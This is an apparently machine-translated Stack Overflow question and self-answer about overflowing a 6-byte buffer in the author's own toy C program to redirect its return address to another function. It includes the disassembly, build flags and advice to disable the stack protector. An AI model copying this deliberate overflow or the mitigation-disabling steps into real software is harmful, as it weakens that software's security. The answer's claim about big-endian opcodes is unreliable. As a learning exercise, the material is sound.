重写EBP堆栈返回值

时间:2012-04-19 22:08:52

标签: assembly linux-kernel stack stack-overflow buffer-overflow

您好我正在尝试为我构建的简单程序编写溢出漏洞利用程序。贝娄是我写过的C程序。

#include <unistd.h>
#include <string.h>
#include <stdio.h>

char *string_in = "Did not work";

int test(char *this){
char sum_buf[6];
strncpy(sum_buf,this,24);
return 0;
}

void hello(){
printf("hello man");
string_in = "If this triggered, it means our shell code is working\n";
return;
}

int main(int argc, void **argv){

test("01234567890123456789\x00\x40\x06\x02");
printf("My string is %s",string_in);
return 0;

}

基本上发生的是,字符串假设在覆盖EBP中读取,其值为0x00400602,这是我的函数hello()的返回地址。我知道这是我的函数hello的地址值,因为objdump -d test_stack.o。从对象转储中,我可以看出rsp已提前20个字节,如下所示

00000000004005b4 <test>:
  4005b4:   55                      push   %rbp
  4005b5:   48 89 e5                mov    %rsp,%rbp
  4005b8:   48 83 ec 20             sub    $0x20,%rsp
  4005bc:   48 89 7d e8             mov    %rdi,-0x18(%rbp)
  4005c0:   64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
  4005c7:   00 00 
  4005c9:   48 89 45 f8             mov    %rax,-0x8(%rbp)
  4005cd:   31 c0                   xor    %eax,%eax
  4005cf:   48 8b 4d e8             mov    -0x18(%rbp),%rcx
  4005d3:   48 8d 45 f0             lea    -0x10(%rbp),%rax
  4005d7:   ba 18 00 00 00          mov    $0x18,%edx
  4005dc:   48 89 ce                mov    %rcx,%rsi
  4005df:   48 89 c7                mov    %rax,%rdi
  4005e2:   e8 a9 fe ff ff          callq  400490 <strncpy@plt>
  4005e7:   b8 00 00 00 00          mov    $0x0,%eax
  4005ec:   48 8b 55 f8             mov    -0x8(%rbp),%rdx
  4005f0:   64 48 33 14 25 28 00    xor    %fs:0x28,%rdx
  4005f7:   00 00 
  4005f9:   74 05                   je     400600 <test+0x4c>
  4005fb:   e8 a0 fe ff ff          callq  4004a0 <__stack_chk_fail@plt>
  400600:   c9                      leaveq 
  400601:   c3                      retq   

0000000000400602 <hello>:
  400602:   55                      push   %rbp
  400603:   48 89 e5                mov    %rsp,%rbp
  400606:   b8 6d 07 40 00          mov    $0x40076d,%eax
  40060b:   48 89 c7                mov    %rax,%rdi
  40060e:   b8 00 00 00 00          mov    $0x0,%eax
  400613:   e8 98 fe ff ff          callq  4004b0 <printf@plt>
  400618:   48 c7 05 0d 0a 20 00    movq   $0x400778,0x200a0d(%rip)        #

因为亚$ 20,%rsp我知道我需要写至少20个字节...但我不确定我需要写多少才能进入我的rbp。它可能来自我的calq,我需要写8或我的字节,因为有2个x调用。虽然我真的不确定我需要写多少。

我像这样编译我的程序...... 

gcc -g stack.c -o test_stack.o
execstack -s test_stack.o

由于我使用的是ubuntu 11,我的内核版本就像3.0.17所以我知道我的aslr默认是打开的。我可能需要关闭它,但我不知道该怎么做。我也正在运行i386:x86_64。我可以告诉我的堆栈在运行期间的实际情况吗?我怎样才能使这个工作起来?如何找到我需要写多少?

感谢您的帮助

1 个答案:

答案 0 :(得分:0)

第一个问题是我必须使用-fno-stack-protector标志关闭堆栈保护。一旦我这样做,覆盖我的缓冲区就变得容易多了。第二个问题是即使字符串被读取并以小端存储,操作码和操作数似乎用大端解释。我不明白为什么会这样。最后,我没有兴趣覆盖EBP堆栈框架......这是我的函数的返回地址。这意味着我需要有效地覆盖高达32个字节,而不是写入24个字节。我终于让程序运转了!

相关问题
最新问题